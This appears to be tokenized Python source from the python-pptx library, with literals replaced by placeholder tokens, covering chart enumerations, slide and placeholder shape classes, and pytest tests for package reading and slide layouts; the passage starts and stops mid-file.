<EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:2> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:none>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:3> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> ) <EOL> class XL_TICK_LABEL_POSITION ( XmlEnumeration ) : <EOL> """<STR_LIT>""" <EOL> __ms_name__ = '<STR_LIT>' <EOL> __url__ = ( <EOL> '<STR_LIT>' <EOL> ) <EOL> __members__ = ( <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT>' , '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , <NUM_LIT:4> , '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) , <EOL> XmlMappedEnumMember ( <EOL> '<STR_LIT>' , - <NUM_LIT> , '<STR_LIT:none>' , '<STR_LIT>' <EOL> ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from . . import parse_xml <EOL> from . . ns import nsdecls <EOL> from . . simpletypes import XsdString <EOL> from . . xmlchemy import ( <EOL> BaseOxmlElement , OneAndOnlyOne , OptionalAttribute , ZeroOrOne <EOL> ) <EOL> class CT_CommonSlideData ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> spTree = OneAndOnlyOne ( '<STR_LIT>' ) <EOL> name = OptionalAttribute ( '<STR_LIT:name>' , XsdString , default = '<STR_LIT>' ) <EOL> class CT_Slide ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> _tag_seq = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> cSld = OneAndOnlyOne ( '<STR_LIT>' ) <EOL> clrMapOvr = ZeroOrOne ( '<STR_LIT>' , successors = _tag_seq [ <NUM_LIT:2> : ] ) <EOL> del _tag_seq <EOL> @ classmethod <EOL> def new ( cls ) : <EOL> """<STR_LIT>""" <EOL> return parse_xml ( cls . _sld_xml ( ) ) <EOL> @ property <EOL> def spTree ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . cSld . spTree <EOL> @ staticmethod <EOL> def _sld_xml ( ) : <EOL> return ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % nsdecls ( '<STR_LIT:a>' , '<STR_LIT:p>' , '<STR_LIT:r>' ) <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import ( <EOL> absolute_import , division , print_function , unicode_literals <EOL> ) <EOL> from . autoshape import Shape <EOL> from . base import BaseShape <EOL> from . . enum . shapes import MSO_SHAPE_TYPE , PP_PLACEHOLDER <EOL> from . graphfrm import GraphicFrame <EOL> from . . oxml . shapes . graphfrm import CT_GraphicalObjectFrame <EOL> from . . oxml . shapes . picture import CT_Picture <EOL> from . picture import Picture <EOL> from . . util import Emu <EOL> class _InheritsDimensions ( object ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def height ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT>' ) <EOL> @ height . setter <EOL> def height ( self , value ) : <EOL> self . _element . cy = value <EOL> @ property <EOL> def left ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT:left>' ) <EOL> @ left . setter <EOL> def left ( self , value ) : <EOL> self . _element . x = value <EOL> @ property <EOL> def shape_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return MSO_SHAPE_TYPE . PLACEHOLDER <EOL> @ property <EOL> def top ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT>' ) <EOL> @ top . setter <EOL> def top ( self , value ) : <EOL> self . _element . y = value <EOL> @ property <EOL> def width ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _effective_value ( '<STR_LIT:width>' ) <EOL> @ width . setter <EOL> def width ( self , value ) : <EOL> self . _element . cx = value <EOL> def _effective_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> directly_applied_value = getattr ( <EOL> super ( _InheritsDimensions , self ) , attr_name <EOL> ) <EOL> if directly_applied_value is not None : <EOL> return directly_applied_value <EOL> return self . _inherited_value ( attr_name ) <EOL> def _inherited_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> layout_placeholder = self . _layout_placeholder <EOL> if layout_placeholder is None : <EOL> return None <EOL> inherited_value = getattr ( layout_placeholder , attr_name ) <EOL> return inherited_value <EOL> @ property <EOL> def _layout_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> layout , idx = self . _slide_layout , self . _element . ph_idx <EOL> return layout . placeholders . get ( idx = idx ) <EOL> @ property <EOL> def _slide_layout ( self ) : <EOL> """<STR_LIT>""" <EOL> slide = self . part <EOL> return slide . slide_layout <EOL> class _BaseSlidePlaceholder ( _InheritsDimensions , BaseShape ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def is_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> @ property <EOL> def shape_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return MSO_SHAPE_TYPE . PLACEHOLDER <EOL> def _replace_placeholder_with ( self , element ) : <EOL> """<STR_LIT>""" <EOL> element . _nvXxPr . nvPr . _insert_ph ( self . _element . ph ) <EOL> self . _element . addprevious ( element ) <EOL> self . _element . getparent ( ) . remove ( self . _element ) <EOL> self . _element = None <EOL> class BasePlaceholder ( Shape ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def idx ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_idx <EOL> @ property <EOL> def orient ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_orient <EOL> @ property <EOL> def ph_type ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_type <EOL> @ property <EOL> def sz ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sp . ph_sz <EOL> class LayoutPlaceholder ( BasePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def height ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT>' ) <EOL> @ property <EOL> def left ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT:left>' ) <EOL> @ property <EOL> def top ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT>' ) <EOL> @ property <EOL> def width ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _direct_or_inherited_value ( '<STR_LIT:width>' ) <EOL> def _direct_or_inherited_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> directly_applied_value = getattr ( <EOL> super ( LayoutPlaceholder , self ) , attr_name <EOL> ) <EOL> if directly_applied_value is not None : <EOL> return directly_applied_value <EOL> inherited_value = self . _inherited_value ( attr_name ) <EOL> return inherited_value <EOL> def _inherited_value ( self , attr_name ) : <EOL> """<STR_LIT>""" <EOL> master_placeholder = self . _master_placeholder <EOL> if master_placeholder is None : <EOL> return None <EOL> inherited_value = getattr ( master_placeholder , attr_name ) <EOL> return inherited_value <EOL> @ property <EOL> def _master_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> inheritee_ph_type = { <EOL> PP_PLACEHOLDER . BODY : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . CHART : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . BITMAP : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . CENTER_TITLE : PP_PLACEHOLDER . TITLE , <EOL> PP_PLACEHOLDER . ORG_CHART : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . DATE : PP_PLACEHOLDER . DATE , <EOL> PP_PLACEHOLDER . FOOTER : PP_PLACEHOLDER . FOOTER , <EOL> PP_PLACEHOLDER . MEDIA_CLIP : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . OBJECT : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . PICTURE : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . SLIDE_NUMBER : PP_PLACEHOLDER . SLIDE_NUMBER , <EOL> PP_PLACEHOLDER . SUBTITLE : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . TABLE : PP_PLACEHOLDER . BODY , <EOL> PP_PLACEHOLDER . TITLE : PP_PLACEHOLDER . TITLE , <EOL> } [ self . ph_type ] <EOL> slide_master = self . _slide_master <EOL> master_placeholder = slide_master . placeholders . get ( <EOL> inheritee_ph_type , None <EOL> ) <EOL> return master_placeholder <EOL> @ property <EOL> def _slide_master ( self ) : <EOL> """<STR_LIT>""" <EOL> slide_layout = self . part <EOL> slide_master = slide_layout . slide_master <EOL> return slide_master <EOL> class MasterPlaceholder ( BasePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> class SlidePlaceholder ( _InheritsDimensions , Shape ) : <EOL> """<STR_LIT>""" <EOL> class ChartPlaceholder ( _BaseSlidePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> def insert_chart ( self , chart_type , chart_data ) : <EOL> """<STR_LIT>""" <EOL> rId = self . part . add_chart_part ( chart_type , chart_data ) <EOL> graphicFrame = self . _new_chart_graphicFrame ( <EOL> rId , self . left , self . top , self . width , self . height <EOL> ) <EOL> self . _replace_placeholder_with ( graphicFrame ) <EOL> return PlaceholderGraphicFrame ( graphicFrame , self . _parent ) <EOL> def _new_chart_graphicFrame ( self , rId , x , y , cx , cy ) : <EOL> """<STR_LIT>""" <EOL> id_ , name = self . id , self . name <EOL> return CT_GraphicalObjectFrame . new_chart_graphicFrame ( <EOL> id_ , name , rId , x , y , cx , cy <EOL> ) <EOL> class PicturePlaceholder ( _BaseSlidePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> def insert_picture ( self , image_file ) : <EOL> """<STR_LIT>""" <EOL> pic = self . _new_placeholder_pic ( image_file ) <EOL> self . _replace_placeholder_with ( pic ) <EOL> return PlaceholderPicture ( pic , self . _parent ) <EOL> def _new_placeholder_pic ( self , image_file ) : <EOL> """<STR_LIT>""" <EOL> rId , desc , image_size = self . _get_or_add_image ( image_file ) <EOL> id_ , name = self . id , self . name <EOL> pic = CT_Picture . new_ph_pic ( id_ , name , desc , rId ) <EOL> pic . crop_to_fit ( image_size , ( self . width , self . height ) ) <EOL> return pic <EOL> def _get_or_add_image ( self , image_file ) : <EOL> """<STR_LIT>""" <EOL> image_part , rId = self . part . get_or_add_image_part ( image_file ) <EOL> desc , image_size = image_part . desc , image_part . _px_size <EOL> return rId , desc , image_size <EOL> class PlaceholderGraphicFrame ( GraphicFrame ) : <EOL> """<STR_LIT>""" <EOL> @ property <EOL> def is_placeholder ( self ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> class PlaceholderPicture ( _InheritsDimensions , Picture ) : <EOL> """<STR_LIT>""" <EOL> class TablePlaceholder ( _BaseSlidePlaceholder ) : <EOL> """<STR_LIT>""" <EOL> def insert_table ( self , rows , cols ) : <EOL> """<STR_LIT>""" <EOL> graphicFrame = self . _new_placeholder_table ( rows , cols ) <EOL> self . _replace_placeholder_with ( graphicFrame ) <EOL> return PlaceholderGraphicFrame ( graphicFrame , self . _parent ) <EOL> def _new_placeholder_table ( self , rows , cols ) : <EOL> """<STR_LIT>""" <EOL> id_ , name , height = self . id , self . name , Emu ( rows * <NUM_LIT> ) <EOL> return CT_GraphicalObjectFrame . new_table_graphicFrame ( <EOL> id_ , name , rows , cols , self . left , self . top , self . width , height <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function , unicode_literals <EOL> import pytest <EOL> from pptx . opc . constants import ( <EOL> CONTENT_TYPE as CT , RELATIONSHIP_TARGET_MODE as RTM <EOL> ) <EOL> from pptx . opc . oxml import CT_Relationship <EOL> from pptx . opc . packuri import PackURI <EOL> from pptx . opc . phys_pkg import _ZipPkgReader <EOL> from pptx . opc . pkgreader import ( <EOL> _ContentTypeMap , PackageReader , _SerializedPart , _SerializedRelationship , <EOL> _SerializedRelationshipCollection <EOL> ) <EOL> from . unitdata . types import a_Default , a_Types , an_Override <EOL> from . . unitutil . mock import ( <EOL> call , class_mock , function_mock , initializer_mock , method_mock , Mock , <EOL> patch <EOL> ) <EOL> class DescribePackageReader ( object ) : <EOL> @ pytest . fixture <EOL> def from_xml ( self , request ) : <EOL> return method_mock ( request , _ContentTypeMap , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def init ( self , request ) : <EOL> return initializer_mock ( request , PackageReader ) <EOL> @ pytest . fixture <EOL> def _load_serialized_parts ( self , request ) : <EOL> return method_mock ( request , PackageReader , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def PhysPkgReader_ ( self , request ) : <EOL> _patch = patch ( <EOL> '<STR_LIT>' , spec_set = _ZipPkgReader <EOL> ) <EOL> request . addfinalizer ( _patch . stop ) <EOL> return _patch . start ( ) <EOL> @ pytest . fixture <EOL> def _SerializedPart_ ( self , request ) : <EOL> return class_mock ( request , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def _SerializedRelationshipCollection_ ( self , request ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' <EOL> ) <EOL> @ pytest . fixture <EOL> def _srels_for ( self , request ) : <EOL> return method_mock ( request , PackageReader , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def _walk_phys_parts ( self , request ) : <EOL> return method_mock ( request , PackageReader , '<STR_LIT>' ) <EOL> def it_can_construct_from_pkg_file ( self , init , PhysPkgReader_ , from_xml , <EOL> _srels_for , _load_serialized_parts ) : <EOL> phys_reader = PhysPkgReader_ . return_value <EOL> content_types = from_xml . return_value <EOL> pkg_srels = _srels_for . return_value <EOL> sparts = _load_serialized_parts . return_value <EOL> pkg_file = Mock ( name = '<STR_LIT>' ) <EOL> pkg_reader = PackageReader . from_file ( pkg_file ) <EOL> PhysPkgReader_ . assert_called_once_with ( pkg_file ) <EOL> from_xml . assert_called_once_with ( phys_reader . content_types_xml ) <EOL> _srels_for . assert_called_once_with ( phys_reader , '<STR_LIT:/>' ) <EOL> _load_serialized_parts . assert_called_once_with ( phys_reader , pkg_srels , <EOL> content_types ) <EOL> phys_reader . close . assert_called_once_with ( ) <EOL> init . assert_called_once_with ( content_types , pkg_srels , sparts ) <EOL> assert isinstance ( pkg_reader , PackageReader ) <EOL> def it_can_iterate_over_the_serialized_parts ( self ) : <EOL> partname , content_type , blob = ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> spart = Mock ( name = '<STR_LIT>' , partname = partname , <EOL> content_type = content_type , blob = blob ) <EOL> pkg_reader = PackageReader ( None , None , [ spart ] ) <EOL> iter_count = <NUM_LIT:0> <EOL> for retval in pkg_reader . iter_sparts ( ) : <EOL> iter_count += <NUM_LIT:1> <EOL> assert retval == ( partname , content_type , blob ) <EOL> assert iter_count == <NUM_LIT:1> <EOL> def it_can_iterate_over_all_the_srels ( self ) : <EOL> pkg_srels = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> sparts = [ <EOL> Mock ( name = '<STR_LIT>' , partname = '<STR_LIT>' , srels = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> Mock ( name = '<STR_LIT>' , partname = '<STR_LIT>' , srels = [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ] <EOL> pkg_reader = PackageReader ( None , pkg_srels , sparts ) <EOL> generated_tuples = [ t for t in pkg_reader . iter_srels ( ) ] <EOL> expected_tuples = [ <EOL> ( '<STR_LIT:/>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:/>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> assert generated_tuples == expected_tuples <EOL> def it_can_load_serialized_parts ( self , _SerializedPart_ , _walk_phys_parts ) : <EOL> test_data = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> iter_vals = [ ( t [ <NUM_LIT:0> ] , t [ <NUM_LIT:2> ] , t [ <NUM_LIT:3> ] ) for t in test_data ] <EOL> content_types = dict ( ( t [ <NUM_LIT:0> ] , t [ <NUM_LIT:1> ] ) for t in test_data ) <EOL> phys_reader = Mock ( name = '<STR_LIT>' ) <EOL> pkg_srels = Mock ( name = '<STR_LIT>' ) <EOL> _walk_phys_parts . return_value = iter_vals <EOL> _SerializedPart_ . side_effect = expected_sparts = ( <EOL> Mock ( name = '<STR_LIT>' ) , Mock ( name = '<STR_LIT>' ) <EOL> ) <EOL> retval = PackageReader . _load_serialized_parts ( phys_reader , pkg_srels , <EOL> content_types ) <EOL> expected_calls = [ <EOL> call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> call ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> assert _SerializedPart_ . call_args_list == expected_calls <EOL> assert retval == expected_sparts <EOL> def it_can_walk_phys_pkg_parts ( self , _srels_for ) : <EOL> partname_1 , partname_2 , partname_3 = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> part_1_blob , part_2_blob , part_3_blob = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> srels = [ <EOL> Mock ( name = '<STR_LIT>' , is_external = True ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_1 ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_2 ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_1 ) , <EOL> Mock ( name = '<STR_LIT>' , is_external = False , target_partname = partname_3 ) , <EOL> ] <EOL> pkg_srels = srels [ : <NUM_LIT:2> ] <EOL> part_1_srels = srels [ <NUM_LIT:2> : <NUM_LIT:3> ] <EOL> part_2_srels = srels [ <NUM_LIT:3> : <NUM_LIT:5> ] <EOL> part_3_srels = [ ] <EOL> phys_reader = Mock ( name = '<STR_LIT>' ) <EOL> _srels_for . side_effect = [ part_1_srels , part_2_srels , part_3_srels ] <EOL> phys_reader . blob_for . side_effect = [ <EOL> part_1_blob , part_2_blob , part_3_blob <EOL> ] <EOL> generated_tuples = [ t for t in PackageReader . _walk_phys_parts ( <EOL> phys_reader , pkg_srels ) ] <EOL> expected_tuples = [ <EOL> ( partname_1 , part_1_blob , part_1_srels ) , <EOL> ( partname_2 , part_2_blob , part_2_srels ) , <EOL> ( partname_3 , part_3_blob , part_3_srels ) , <EOL> ] <EOL> assert generated_tuples == expected_tuples <EOL> def it_can_retrieve_srels_for_a_source_uri ( <EOL> self , _SerializedRelationshipCollection_ ) : <EOL> phys_reader = Mock ( name = '<STR_LIT>' ) <EOL> source_uri = Mock ( name = '<STR_LIT>' ) <EOL> rels_xml = phys_reader . rels_xml_for . return_value <EOL> load_from_xml = _SerializedRelationshipCollection_ . load_from_xml <EOL> srels = load_from_xml . return_value <EOL> retval = PackageReader . _srels_for ( phys_reader , source_uri ) <EOL> phys_reader . rels_xml_for . assert_called_once_with ( source_uri ) <EOL> load_from_xml . assert_called_once_with ( source_uri . baseURI , rels_xml ) <EOL> assert retval == srels <EOL> class Describe_ContentTypeMap ( object ) : <EOL> def it_can_construct_from_ct_item_xml ( self , from_xml_fixture ) : <EOL> content_types_xml , expected_defaults , expected_overrides = ( <EOL> from_xml_fixture <EOL> ) <EOL> ct_map = _ContentTypeMap . from_xml ( content_types_xml ) <EOL> assert ct_map . _defaults == expected_defaults <EOL> assert ct_map . _overrides == expected_overrides <EOL> def it_matches_an_override_on_case_insensitive_partname ( <EOL> self , match_override_fixture ) : <EOL> ct_map , partname , content_type = match_override_fixture <EOL> assert ct_map [ partname ] == content_type <EOL> def it_falls_back_to_case_insensitive_extension_default_match ( <EOL> self , match_default_fixture ) : <EOL> ct_map , partname , content_type = match_default_fixture <EOL> assert ct_map [ partname ] == content_type <EOL> def it_should_raise_on_partname_not_found ( self ) : <EOL> ct_map = _ContentTypeMap ( ) <EOL> with pytest . raises ( KeyError ) : <EOL> ct_map [ PackURI ( '<STR_LIT>' ) ] <EOL> def it_should_raise_on_key_not_instance_of_PackURI ( self ) : <EOL> ct_map = _ContentTypeMap ( ) <EOL> ct_map . _add_override ( PackURI ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> with pytest . raises ( KeyError ) : <EOL> ct_map [ '<STR_LIT>' ] <EOL> @ pytest . fixture <EOL> def from_xml_fixture ( self ) : <EOL> entries = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , CT . XML ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , CT . PNG ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , CT . PML_PRESENTATION_MAIN ) , <EOL> ) <EOL> content_types_xml = self . _xml_from ( entries ) <EOL> expected_defaults = { } <EOL> expected_overrides = { } <EOL> for entry in entries : <EOL> if entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> ext = entry [ <NUM_LIT:1> ] . lower ( ) <EOL> content_type = entry [ <NUM_LIT:2> ] <EOL> expected_defaults [ ext ] = content_type <EOL> elif entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> partname , content_type = entry [ <NUM_LIT:1> : ] <EOL> expected_overrides [ partname ] = content_type <EOL> return content_types_xml , expected_defaults , expected_overrides <EOL> @ pytest . fixture ( params = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def match_default_fixture ( self , request ) : <EOL> partname_str , ext , content_type = request . param <EOL> partname = PackURI ( partname_str ) <EOL> ct_map = _ContentTypeMap ( ) <EOL> ct_map . _add_override ( PackURI ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> ct_map . _add_default ( ext , content_type ) <EOL> return ct_map , partname , content_type <EOL> @ pytest . fixture ( params = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> def match_override_fixture ( self , request ) : <EOL> partname_str , should_match_partname_str = request . param <EOL> partname = PackURI ( partname_str ) <EOL> should_match_partname = PackURI ( should_match_partname_str ) <EOL> content_type = '<STR_LIT>' <EOL> ct_map = _ContentTypeMap ( ) <EOL> ct_map . _add_override ( partname , content_type ) <EOL> return ct_map , should_match_partname , content_type <EOL> def _xml_from ( self , entries ) : <EOL> """<STR_LIT>""" <EOL> types_bldr = a_Types ( ) . with_nsdecls ( ) <EOL> for entry in entries : <EOL> if entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> ext , content_type = entry [ <NUM_LIT:1> : ] <EOL> default_bldr = a_Default ( ) <EOL> default_bldr . with_Extension ( ext ) <EOL> default_bldr . with_ContentType ( content_type ) <EOL> types_bldr . with_child ( default_bldr ) <EOL> elif entry [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> partname , content_type = entry [ <NUM_LIT:1> : ] <EOL> override_bldr = an_Override ( ) <EOL> override_bldr . with_PartName ( partname ) <EOL> override_bldr . with_ContentType ( content_type ) <EOL> types_bldr . with_child ( override_bldr ) <EOL> return types_bldr . xml ( ) <EOL> class Describe_SerializedPart ( object ) : <EOL> def it_remembers_construction_values ( self ) : <EOL> partname = '<STR_LIT>' <EOL> content_type = '<STR_LIT>' <EOL> blob = '<STR_LIT>' <EOL> srels = '<STR_LIT>' <EOL> spart = _SerializedPart ( partname , content_type , blob , srels ) <EOL> assert spart . partname == partname <EOL> assert spart . content_type == content_type <EOL> assert spart . blob == blob <EOL> assert spart . srels == srels <EOL> class Describe_SerializedRelationship ( object ) : <EOL> def it_remembers_construction_values ( self ) : <EOL> rel_elm = CT_Relationship . new ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . INTERNAL <EOL> ) <EOL> srel = _SerializedRelationship ( '<STR_LIT:/>' , rel_elm ) <EOL> assert srel . rId == '<STR_LIT>' <EOL> assert srel . reltype == '<STR_LIT>' <EOL> assert srel . target_ref == '<STR_LIT>' <EOL> assert srel . target_mode == RTM . INTERNAL <EOL> def it_knows_when_it_is_external ( self ) : <EOL> cases = ( RTM . INTERNAL , RTM . EXTERNAL ) <EOL> expected_values = ( False , True ) <EOL> for target_mode , expected_value in zip ( cases , expected_values ) : <EOL> rel_elm = CT_Relationship . new ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , target_mode <EOL> ) <EOL> srel = _SerializedRelationship ( None , rel_elm ) <EOL> assert srel . is_external is expected_value <EOL> def it_can_calculate_its_target_partname ( self ) : <EOL> cases = ( <EOL> ( '<STR_LIT:/>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> for baseURI , target_ref , expected_partname in cases : <EOL> rel_elm = Mock ( name = '<STR_LIT>' , rId = None , reltype = None , <EOL> target_ref = target_ref , target_mode = RTM . INTERNAL ) <EOL> srel = _SerializedRelationship ( baseURI , rel_elm ) <EOL> assert srel . target_partname == expected_partname <EOL> def it_raises_on_target_partname_when_external ( self ) : <EOL> rel_elm = CT_Relationship . new ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . EXTERNAL <EOL> ) <EOL> srel = _SerializedRelationship ( '<STR_LIT:/>' , rel_elm ) <EOL> with pytest . raises ( ValueError ) : <EOL> srel . target_partname <EOL> class Describe_SerializedRelationshipCollection ( object ) : <EOL> def it_can_load_from_xml ( self , parse_xml , _SerializedRelationship_ ) : <EOL> baseURI , rels_item_xml , rel_elm_1 , rel_elm_2 = ( <EOL> Mock ( name = '<STR_LIT>' ) , Mock ( name = '<STR_LIT>' ) , <EOL> Mock ( name = '<STR_LIT>' ) , Mock ( name = '<STR_LIT>' ) , <EOL> ) <EOL> rels_elm = Mock ( <EOL> name = '<STR_LIT>' , relationship_lst = [ rel_elm_1 , rel_elm_2 ] <EOL> ) <EOL> parse_xml . return_value = rels_elm <EOL> srels = _SerializedRelationshipCollection . load_from_xml ( <EOL> baseURI , rels_item_xml <EOL> ) <EOL> expected_calls = [ <EOL> call ( baseURI , rel_elm_1 ) , <EOL> call ( baseURI , rel_elm_2 ) , <EOL> ] <EOL> parse_xml . assert_called_once_with ( rels_item_xml ) <EOL> assert _SerializedRelationship_ . call_args_list == expected_calls <EOL> assert isinstance ( srels , _SerializedRelationshipCollection ) <EOL> def it_should_be_iterable ( self ) : <EOL> srels = _SerializedRelationshipCollection ( ) <EOL> try : <EOL> for x in srels : <EOL> pass <EOL> except TypeError : <EOL> msg = "<STR_LIT>" <EOL> pytest . fail ( msg ) <EOL> @ pytest . fixture <EOL> def parse_xml ( self , request ) : <EOL> return function_mock ( request , '<STR_LIT>' ) <EOL> @ pytest . fixture <EOL> def _SerializedRelationship_ ( self , request ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> import pytest <EOL> from pptx . enum . shapes import PP_PLACEHOLDER <EOL> from pptx . opc . constants import RELATIONSHIP_TYPE as RT <EOL> from pptx . oxml . shapes . autoshape import CT_Shape <EOL> from pptx . parts . slidelayout import ( <EOL> _LayoutPlaceholders , _LayoutShapeFactory , _LayoutShapeTree , SlideLayout <EOL> ) <EOL> from pptx . parts . slidemaster import SlideMaster <EOL> from pptx . shapes . base import BaseShape <EOL> from pptx . shapes . placeholder import LayoutPlaceholder <EOL> from . . oxml . unitdata . shape import a_ph , a_pic , an_nvPr , an_nvSpPr , an_sp <EOL> from . . unitutil . mock import ( <EOL> class_mock , function_mock , instance_mock , method_mock , property_mock <EOL> ) <EOL> class DescribeSlideLayout ( object ) : <EOL> def it_knows_the_slide_master_it_inherits_from ( self , master_fixture ) : <EOL> slide_layout , slide_master_ = master_fixture <EOL> slide_master = slide_layout . slide_master <EOL> slide_layout . part_related_by . assert_called_once_with ( RT . SLIDE_MASTER ) <EOL> assert slide_master is slide_master_ <EOL> def it_provides_access_to_its_shapes ( self , shapes_fixture ) : <EOL> slide_layout , _LayoutShapeTree_ , layout_shape_tree_ = shapes_fixture <EOL> shapes = slide_layout . 